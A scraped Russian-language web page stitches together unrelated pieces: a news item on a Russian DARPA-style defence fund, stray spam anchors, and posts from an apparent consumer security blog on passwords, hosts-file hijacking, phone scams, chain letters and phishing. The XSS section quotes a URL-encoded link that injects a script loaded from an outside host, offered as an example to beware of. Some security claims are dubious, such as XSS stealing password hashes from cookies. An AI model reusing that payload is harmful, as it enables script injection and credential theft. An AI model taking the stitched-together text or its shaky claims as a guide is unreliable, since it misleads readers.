«Вчера Владимир Путин подписал экспертное заключение правительства по внесению данного законопроекта президенту. Документ вчера ушел президенту России на подписание для внесения в Госдуму», - сказал он.

Рогозин подчеркнул, что «военно-промышленная комиссия свою задачу выполнила». «Поэтому скоро русская DARPA будет создана в России», - пообещал вице-премьер.

Как заявил ранее Рогозин, масштабное перевооружение армии и флота невозможно без программной организации фундаментальных и поисковых исследований в интересах обеспечения обороны и безопасности России, передает ИТАР-ТАСС.

«В рамках решения этой задачи мы создаем фонд для заказа и сопровождения прорывных высокорискованных исследований и разработок в интересах обороны и безопасности государства, а также создание технологий и продукции двойного назначения», - напомнил Рогозин.

По его словам, соответствующий законопроект «в ближайшие дни будет представлен президенту, а потом внесен в палаты Федерального Собрания».

Как сообщала газета ВЗГЛЯД, в январе вице-премьер Дмитрий Рогозин предложил создать в России аналог американского агентства оборонных разработок DARPA. Он подчеркнул, что «речь идет о создании «хищника» научно-исследовательского, который будет выявлять прорывные исследования в области ОПК».

Рогозин отметил, что российская DARPA «ни в коем случае не станет «вторым Сколково», здесь «будут работать всего 250-300 человек - ведущих специалистов в области военных технологий».

В конце марта Рогозин рассказал, что законопроект о создании фонда готов, находится на рассмотрении у председателя правительства и будет внесен от имени президента на рассмотрение в Госдуму.

«Все документы обработаны. Надеюсь, что время от момента внесения в Думу до момента начала работы этого «технического хищника» будет максимально коротко», – сказал вице-премьер.

Тефтели с подливкой / Рассчитать пол ребенка.

Находясь в сети мы все вынуждены часто проходить такой процесс, как регистрация себя любимого на каком-нибудь сайте. В последнее время регистрация пользователя стала обязательным процессом на многих ресурсах (одни без регистрации не пускают внутрь вообще, как то всякие социальные сети, другие только после регистрации открывают доступ к контенту, например торент-трекеры).

Каждый раз мы становимся перед выбором, какой же пароль задать. При этом львиная доля пользователей, почему-то предпочитает простоту безопасности. А зря

Чем грозит подобное халатное отношение при регистрации? В первую очередь тем, что простые пароли вскрываются в два клика. В сети есть масса сайтов, где можно ввести хеш(зашифрованное представление вашего пароля) и получить его (пароль) в первозданном виде. Как можно “подарить” свой хеш злоумышленнику я опишу ниже, а пока запомните – уже давно есть множество словарей паролей, в которых Ваш скорее всего уже тоже есть(как показала практика, оригинальностью нынешние пользователи не страдают). Следовательно, пароль Ваш вскроют очень легко. Спросите, “Да кому нужен мой аккаунт, в тех же контактах?” – отвечу, кому-то да будет нужен.

Уверен, каждый хоть раз получал спам от друзей в личных сообщениях

Ну да ладно, задали Вы при регистрации нормальный, хорошо защищенный пароль, но в один прекрасный момент понимаете что его увели. Сразу возникает вопрос “КАК?! Я же поставил пароль из 16 символов и использованием спецсимволов и букв в разном регистре!”.

Ниже я приведу немного примеров, как можно (но не нужно) попасться:



Проверяйте содержимое файда hosts (c:/windows/system32/drivers/ets/hosts) на своем компьютере. В нормальном случае там не должно быть ничего, кроме записи о 127.0.0.1 . Тот же контакт, ломали массово, с помпой два раза, и оба раза сотни аккаунтов пользователей утекли из-за того, что вирус дописывал в файл hosts редирект для контакта, и, когда пользователь заходил на страницу авторизации, он на самом деле попадал на хост злоумышленника, где добровольно “сливал” свой пароль(размреры файла с паролями росли в геометрической прогрессии). У автора до сих пор хранится два архива(они до сих пор доступны для скачивания) с контаковскими паролями очень многих пользователей, и, Вы не поверите, но большая часть из них, т.е. паролей, вполне валидна
Всегда смотрите что за ссылки Вам присылают. В большинстве случаев вы получаете линки на фейковые странички, где ничего хорошего, кроме геморроя, Вы не найдете. Наиболее популярным является момент, когда делают фейк известного домена, там располагают скрипт, который загружает вирус Вам в машину, а дальше все зависит от фантазии разработчика виря . Либо ломается сайт, вписывается туда iframe через который происходит загрузка всякого мусора на компьютер жертвы.
В дополнение к предыдущему, хочется отдельно вынести такой класс угона, как XSS. Кому интересно что это – гуголь в помощь. Я же расскажу как обезопасить себя от такого. Итак, если Вам дают ссылку, примерно вот такого вида : http://имя_сайта/чего-то там?%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E почти со 100% уверенностью можно сказать что Вас разводят на XSS. Фишка в том, что перейдя по этой ссылке, Вы подарите хеш своего пароля(а он хранится в кукисах браузера) злоумышленнику, который далее расшифрует хеш и ваш пароль станет достоянием общественности. Особо опасайтесь ссылок на википедию, коскольку они очень похоже выглядят. Всегда смотрите на домен – соответствует ли он действительности.

Эти нехитрые советы помогут Вам сберечь Ваши личные данные, находясь в сети. Удачи.

Болтун – находка не только для шпиона, а еще для сотового оператора и для лохотронщиков

Последние, в свою очередь, постоянно следят за новинками рынка связи и придумывают новые схемы обмана. Тем не менее, практикуются также и старые, давно используемые алгоритмы развода на деньги с помощью мобильного телефона. В случае, если Вы получили одно из ниже перечисленных сообщений, не поленитесь и сообщите об этом оператору(о том, что в ответ на сообщение ничего не нужно переводить и слать сообщения, я думаю, понятно). Звонок оператору не означает моментального наказания мошеннику(и иногда может не означать ничего, проверено лично), но каждое такое обращение фиксируется и номер лохотронщика со временем будет блокирован. Конечно, это не помешает купить два, три, сто новых SIM-карт, но всё же…

Самые распространённые схемы обмана с помощью мобильной связи.

СМС – викторины

“Отправь 100 смс и получи пополнение счета на 5 гривен в подарок!”, “Участвуй в викторине и выигрывай путешествие в Египет!!!”, “Петя отправил 5000 сообщений и выиграл автомобиль“… Думаю, часто приходится такое слышать в рекламе или читать в Сети. Вот только если прочесть условия этих викторин, станет понятно, что:

а) Авторы викторины не несут такой-то и такой-то ответсвенности

б) имеют право менять условия конкурсов

в)стоимость смс составляет от 5 гривен и выше

А теперь подумаем, какой процент выигрыша выделяется реальному победителю и существует ли такой в принципе. Единственный момент, эти псевдо-викторины не нужно путать с акциями известных торговых марок – в 99% случаев в таких акциях стоимость смс совпадает с тарифным планом абонента, и ничего более.

Лже-саппорт

Кто: звонок со скрытого или красивого номера и представления звонящего как инженера оператора. Сообщает, что проводятся технические работы на сети, или тестирование нового сервиса, или-или-или.

Как работает: “Для проверки работоспособности услуги наберите, пожалуйста, комбинацию *123*+06….”

Вуаля, деньги со счёта полетели к кидалам. Утырков вычислить и не купиться на развод можно, но при грамотном подходе к делу и при попадании на неопытного абонента – получают свою прибыль.

В последнее время один из хитов – “ошибочный перевод”. На телефон жертвы поступает смс с короткого номера, имитирующее перевод средств. Через 3-5 минут раздаётся звонок “невнимательного человека, по ошибке набравшего не тот номер для перевода” и просьба вернуть деньги на счёт.

Те, кто часто пользуются услугой перевода средств, наверняка хотя бы один раз ошибались номером и успевали отменить транзакцию(вроде бы, ранее такая возможность была, как сейчас – не знаю).



Здесь лохотронщики могут и обломаться – у цели может не быть денег на счёте и переводить будет нечего, даже если захочет. А может и быть, но не переведёт – есть и такие люди(если допустить, что им попадают на счёт реальные деньги). В любом из двух случаев “облома кидал”, цель проверяет свой баланс и, если совсем уж скучно, звонит в колл-центр и сдаёт гадов:)

Радует то, что наши операторы начали уделять хоть какое-то внимание мобильному мошенничеству. Потому что ранее, всё что делал любой оператор – блокировал скам-номер и всё. Теперь же они начали проводить ликбезы для своих абонентов, то есть для нас с Вами. Например, на сайте МТС есть рекомендации, как избежать обмана и что делать в случае получения подозрительных смс или звонков. Хоть это и капля в море, но всё-равно, респект:)

Иногда, наблюдая, с каких источников приходят пользователи на блог, я захожу на форумы, соцсети, чаты – мне интересно, как подана “наживка” и как кто-то из пользователь, уже посетивший SafeWeb.com.ua, постит ссылку на определённую статью.

Последнее время стал замечать некоторый трафик из вконтакта. Походил, поискал, нашел группу, созданную для поиска донора некоей Мариной. Я всё понимаю – можно хотеть помочь людям и переслать сообщение, можно открыть 10 групп в соцсетях, но как сказал автор той группы – его попросила поставить такой статус знакомая, внимание, подруга которой ищет донора для ребёнка. Очень жаль, что после моих комментариев группу удалили – очень хотелось посмотреть на эту заботливую подругу, а ещё интереснее – пообщаться с ней.

Что это? Борьба за мир во всём мире? Желание помочь всем? Или просто стадный эффект? Примерно такие же вопросы я задал форумчанам на одном российском форуме из разряда “Кому за 40″. Я не ожидал аплодисментов и похвалы в свой адрес, но, прочитав, что я бессердечная скотина, потому что:

а) не разместил у себя статус

б)упрекнул в его размещении автора топика на форуме

стало как-то жаль этих людей. Я понимаю, что они – старшее поколение, и их надо уважать. Но почему не понимают они, что сейчас не те времена, когда можно доверять всему, что видишь и читаешь, особенно в Сети, и не делать никаких действий, предварительно не поискав дополнительной информации?

Если есть возможность помочь людям – пожалуйста – огромное количество различных благотворительных фондов, детских домов, в конце концов, заповедников и питомников. Найти их сайты или контакты не сложно, и свою помощь можно предоставить разными способами. И на этих сайтах есть полная информация обо всём – что кому необходимо, где находится, как найти, руководство фондов и так далее. Почему же интернет-сообщество считает, что лучше поспамить призрачным сообщением от Марины?



Кроме того, когда человек узнаёт, что это – развод, чья-то глупая шутка, обман и т.д. – что он первое говорит? Правильно, “Вот уроды(гады, козлы и т.д.), как же так можно играть на человеческих чувствах???”

А мне вот интересно, а задумываются ли они, что это именно они – гады и козлы? Потому что пересылают мусор по сети всеми возможными способами, тем самым умножая его в сотни и тысячи раз. Ибо – именно этот случай имел начало с нескольких спаммерских сообщений где-то в России, сейчас же – это десятки тысяч сообщений в день во всём Рунете. Те, кто его начал – это понятно, кто он(они) и куда бы их каждый послал. А продолжают это “дело” другие пользователи, которым в аське или контакте пришло сообщение – “Поставь себе статус, моей подруге очень надо…”

Стыдно, товарищи…

NB. К чему я все это выкладываю… Хочется, чтоб хотя бы те немногие, кто попадают на сайт, разделяли мое мнение в отношении интернет-мошенников, спама и прочих отбросов Сети и делились этой информацией с другими. Меня радует, что по многим запросам лохотронов мой сайт попадает в топ-5 поисковых систем – это значит, что если человек ищет что-то и находит у меня – скорее всего он откажется от покупки, посещения сайта, отправки резюме и т.д. И хотя бы на 0.000001 процентов спамеры и лохотронщики Рунета получат меньше наживы.

работа в минске

На мой номер МТС сегодня пришло сообщение о том, что я выиграл приз. Ха-ха:)

Читаем смс, цитирую:

mts.cоm.uа

Vu vugralu pruz, ze detal’noyu informacieyu telefonujte 091-959-48-17

Сообщение отправлено с номера Билайна:

068-553-20-98


Сразу заметен размах по сетям операторов. К тому же, спам шел целенаправленно на абонентов определенного города.

Звоню на 0685532098, дозвона нет, короткие гудки. Набираю номер ютела 0919594817.



Идет КПВ и ответ:

-блаблабла, оператор мтс Вiктор, слухаю вас.

Оп-па:).Я:

-Здрасьте. Мне пришло смс что я что-то выиграл, сказали позвонить вам.

Стараюсь сделать тон речи максимально “простяцким”. Как оказывается через пару секунд, это не помогло и “оператор” понимает, что я звоню целенаправленно выявить лохотрон. И он решил с корабля на бал:

-Вы взрослый человек, а верите в сказки что могли что-то выиграть?

-А что, пришло же сообщение?

-Это наверное какая-то ошибка, нам сегодня весь день звонят.

Ага, ещё бы:D

Продолжаем разговор. Я:

-То есть, по этому номеру нет никакой акции?

-Нет, мы вообще фирма города блабла и не проводим акций.

-Но вы же оператор? В какую фирму я попал?

-Мы фирма вашего города.

Дальнейший разговор был бы бесполезен и я ложу трубку. Но после окончания разговора как-то не вспомнил приветствие этого умника, поэтому перезваниваю ещё раз, с другого номера:

-Оператор мтс Вiктор, слухаю вас.

Вуаля, если после первого разговора я ещё мог подумать, что с номера би шла просто рассылка с целью слить чей-то номер для звонков, то сейчас эта фантазия развеялась. К тому же, спам пришёл целенаправленно, то есть на номер, лохотронщики знают, абонентам какого города шлют смс.

И пока для меня остаётся загадкой, в чем суть развода – просто получить звонок и доплату на утел за входящие(маловероятно, неоправданные затраты) или развести лохов на пополнение счёта или оплату чьего-то кошелька.

Письма счастья вернулись в корпоративные сети, ура!!!

На сей раз это не сочинение в стиле “Перешли эту гадость 50 людям и будет тебе счастье”. Какая-то сволочь перевела польское письмо счастья, распространяемое в польской же соцсети, с просьбой о помощи на украинский язык и запустила вконтакте и по e-mail.

Кстати, тема нынешней цепочки снова давит на жалость, как и в случае с Мариной, ищущей донора по всем странам бывшего СНГ на протяжении пяти лет.

Фрагмент спама:

Привіт!

Надсилаю це тобі не у якості спаму. Просто якщо й справді можна допомогти дитині вижити лише переславши листа – це дійсно варта справа. Я прошу вас прочитати, хоча б половину цього листа і відправити його, по можливості всім своїм знайомим. Після перших трьох речень Ви зрозумієте, про що йдеться. Читайте уважно!

Или:

> > Я прошу вас прочитати, хоча б половину цього листа і відправити його,
> > по можливості всім своїм знайомим.
> >
> > Після перших трьох речень Ви зрозумієте, про що йдеться. Читайте
> > уважно! Якщо ви видалитеи цей лист …. це буде означати, що ви просто
> > не маєте серця.

И понеслась!! И дальше на тематику помощи ребенку. “Добрые” люди, получив эту гадость, усердно составляют списки адресатов, если поля “Кому” в ящике не хватает – не беда, есть “Копия”. И понеслось письмецо на тысячи адресов, в теле письма – куча служебных контактов людей из разных компаний, а спамеры собирают адресочки в базу. И ладно, светился бы только адрес отправителя, завалит спамом – не жалко, но остальные при чем? Кроме наполнения спам-баз своими адресами и адресами коллег, доблестные офисные любители протупить также светят свои подписи, в которых указаны служебные и личные телефоны, иногда адрес офиса и всегда – должность идиота.

Но вернёмся к сабжу. Который, кстати, сейчас распространяется по рунету в двух вариантах, немного отличающихся друг от друга.

> >Epuls” і “Onet”погодився допомогти
> > нам. Єдиний спосіб зробити це полягає в тому, що я посилаю цей > >лист до вас, і ви посилаєте його до інших людей. “Onet” перевіряє, > >скільки людей отримали лист. Будь-яка особа, яка відкриває

> > лист і відправляє
> > його до щонайменше трьох людей, дає нам 32 центи. Будь ласка,
> > допоможіть нам!

Неужели сложно подумать, “а кто такие “Epuls” і “Onet”? “А как они проверят количество отправленных писем?”

Для справки, указанные названия – это имена польских социальных сетей по типу нашего вконтакта. И письмо это родилось на свет именно в одной из них два-три года назад, а теперь его перевели на украинский язык и запустили у нас.

> > Якщо ви відправите це повідомлення до 11 осіб, у
> > вашому профілі буде гарний значок.

Ну как, гарний значок появился в профиле??? А-ха-ха.

И большинство из сердобольных пересыльщиков – это люди, занимающие должности от специалиста до директоров крупных компаний. Как в том анекдоте – “Такой большой, а в сказки веришь” – жертва спама считает, что внесла некую лепту для помощи кому-то, а при пересылке письма обычно ставит пост-сриптум в виде фразы “Я в это не верю, но на всякий случай…“, “Извините, попросили помочь“, “Тронула эта просьба” и т.д.

Людей не изменить, пока они сами не научатся думать и пока детство в жопе не перестанет играть. А если Вы читаете этот пост, значит у Вас всё в порядке с восприятием информации и Вы умеете думать правильно:)

Фишинг – одна из разновидностей интернет-мошенничества в Интернете, основная задача его состоит в имитации другого сайта и получения данных пользователя – логина и пароля или номера кредитки.

Чаще всего используются два способа реализации фишинга:

Вам на почту приходит письмо, якобы с известного ресурса – начиная от интернет-магазинов и заканчивая сайтами платёжных систем. Если это сервис бесплатных имейл, может прийти сообщение от адресата, допустим, help-support-team@mail.ru. То есть что-то, что сразу может указать на принадлежность отправителя к администрации сайта. Обязательно в любом письме будет приманка в виде обращения “администрации” к пользователю – это может быть или технические работы на сервере, или оптимизация базы данных, да что угодно. После легенды указывается ссылка на сайт, с просьбой зайти и выполнить какое-либо действие – подтвердить регистрацию, обновить данные и т.д. Вот здесь фишинг проявляется во всей своей красе: указанная ссылка – обманка, но визуально очень похожа на настоящий сайт. Например, это может быть vkоtаkte.ru, odnоklаssnikl.ru, то есть домен, визуально похожий на оригинал. И чем точнее сходство, тем больше жертв попадает к фишерам.

Далее всё происходит быстро и просто. Если пользователь переходит на сайт, он видит точно такую же страницу, как у оригинала. Особенно легко подделывают внешний вид социальных сетей, т.к. дизайн страницы входа очень прост и нет никакого контента.

Если ввести в такие поля свой логин и пароль – они моментально пересылаются фишеру по почте. Потом уже неважно – произойдёт редирект на оригинальный сайт или нет – пароль уже украден и скоро воспользоваться ним вы уже не сможете.

Очень распространённое сообщение в соцсетях и в icq – “Смотри, какую я фотку с тобой нашёл”, “Ты не поверишь, что о тебе здесь пишут” и всё в таком же духе. Многие ведутся на такие сообщения и спешат посмотреть, что же о них написали плохого.

Точно также работает фишинговая атака с пользователями банков и системами онлайн-платежей. Только в этом случае потерять можно не только учётку от вконтакта, а деньги со счёта.

Второй способ более сложный в исполнении, но он является более результативным для мошенников. Суть его во взломе оригинального сайта и подставления своего скрипта или полей формы для ввода учётных данных. В таком случае определить визуально подстановку практически невозможно, т.к. имя сайта – правильное. Единственный вариант – это если видите, что с привычной формой входа что-то не так – разные размеры полей, вокруг формы есть левые ссылки и т.д.

Как защититься.

В первую очередь

1. Никогда не переходить по ссылкам от незнакомых людей, неважно, как эту ссылку прислали и что написано в тексте. Текст сообщения может быть абсолютно любой, его основная цель – побудить пользователя перейти на сайт.

2. Использовать последние версии браузеров. Ещё лучше – использовать самые надёжные браузеры – firefox, chrome. Любой хороший браузер при переходе по фишинговой ссылке выдаёт соответствующее предупреждение.

3. Иметь хороший антивирус с обновлёнными базами.

При попытке открыть подозрительные сайты антивирус должен предупредить об этом.

4. При проведении онлайн-платежей проверять наличие сертификата SSL на сайте. Защищенное соединение видно в адресной строке – https. Также на сайте должен быть сертификат SSL, подтверждённый не самим сайтом, а третьей стороной. Как правило, это американские компании, такие как Network Solutions L.L.C., Verisign и т.д.

Сертификат не должен быть просрочен. Проверить его наличие можно, кликнув по иконке слева или справа от адресной строки: